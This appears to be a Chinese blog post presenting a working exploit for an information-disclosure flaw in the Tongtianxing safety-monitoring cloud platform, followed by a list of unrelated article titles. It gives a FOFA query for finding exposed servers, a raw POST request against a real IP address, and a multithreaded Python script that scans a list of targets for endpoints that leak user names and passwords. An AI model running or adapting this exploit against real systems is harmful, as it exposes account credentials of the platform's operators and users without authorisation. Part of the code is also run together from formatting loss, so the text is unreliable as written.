【通天星主动安全监控云平台信息泄露漏洞】

fofa：
body="./open/webApi.html"

POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
Host: 140.249.48.195:8088
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 9json=null

import requests
from requests import RequestException
import urllib3
import threadingurllib3.disable_warnings()Path = {"path":"/808gps/StandardLoginAction_getAllUser.action"
}Header = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0","Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2","Content-type": "application/x-www-form-urlencoded"
}date = {"json":"null"
}keyword = ["name","password","id","admin","account"]def poc(uri):url = uri.strip()+Path["path"]try:response = requests.post(data=date,headers=Header,url=url,timeout=3,verify=False)flag = response.textfor i in keyword:if i in flag:print(f"{uri.strip("\n")}存在漏洞")breakexcept RequestException as e:passdef Mut_Thead():threads = []with open("url.txt","r") as f:for uri in f:thread = threading.Thread(target=poc,args=((uri,)))threads.append(thread)for thread in threads:thread.start()for thread in threads:thread.join()print("all check down")if __name__ == '__main__':print("开始")Mut_Thead()

相关文章：

北京网站建设多少钱？

辽宁网页制作哪家好_网站建设

高端品牌网站建设_汉中网站制作

MySQL数据库入门，pycharm连接数据库—详细讲解

算法的学习笔记—调整数组顺序使奇数位于偶数前面(牛客JZ21)

CSS的:valid和:invalid伪类：增强表单验证的视觉反馈

PyTorch 基础学习（7）- 自动微分

【计算机人接私活】手把手教你上手挖到第一个漏洞，从底薪3k到月入过万，只有一步之遥！

C语言 ——— 枚举类型的定义及其优点

Qt-多种方式实现helloworld(6)

技术周总结08.12-08.18周日(C#开发环境搭建 Linux命令)

蓝图中结构体改变后，要重新创建widget

系统开发之禁止卸载应用名单

图卷积（GCN）

第一章——数组基础（概念篇python版）

Android+Jacoco+code-diff全量、增量覆盖率生成实战

共享经济背景下校园、办公闲置物品交易平台-计算机毕设Java|springboot实战项目

系统架构设计师 - 软件工程(2)

[微信小程序] 使用ES6特性Class后出现编译异常

【跃迁之路】【699天】程序员高效学习方法论探索系列（实验阶段456-2019.1.19）...

download使用浅析

github从入门到放弃(1)

Intervention/image 图片处理扩展包的安装和使用

java 多线程基础, 我觉得还是有必要看看的

javascript 哈希表

js

k个最大的数及变种小结

MySQL主从复制读写分离及奇怪的问题

Nodejs和JavaWeb协助开发

RxJS 实现摩斯密码(Morse) 【内附脑图】

socket.io+express实现聊天室的思考（三）

Vue UI框架库开发介绍

多线程事务回滚

免费小说阅读小程序

模仿 Go Sort 排序接口实现的自定义排序

阿里云服务器如何修改远程端口？

完善智慧办公建设，小熊U租获京东数千万元A+轮融资 ...

​flutter 代码混淆

​LeetCode解法汇总2808. 使循环数组所有元素相等的最少秒数

# 20155222 2016-2017-2 《Java程序设计》第5周学习总结

# dbt source dbt source freshness命令详解

# 睡眠3秒_床上这样睡觉的人，睡眠质量多半不好

###51单片机学习（1）-----单片机烧录软件的使用，以及如何建立一个工程项目

$(function(){})与(function($){....})(jQuery)的区别

(function(){})()的分步解析

(转)h264中avc和flv数据的解析

（转）创业家杂志：UCWEB天使第一步

(转载)Linux 多线程条件变量同步

（转载）PyTorch代码规范最佳实践和样式指南

./mysql.server: 没有那个文件或目录_Linux下安装MySQL出现“ls: /var/lib/mysql/*.pid: 没有那个文件或目录”...

.apk 成为历史！

.htaccess配置常用技巧

.net core 6 redis操作类

.NET Core 中插件式开发实现

.net core控制台应用程序初识

.NET Framework杂记

.NET8 动态添加定时任务（CRON Expression, Whatever）

.Net实现SCrypt Hash加密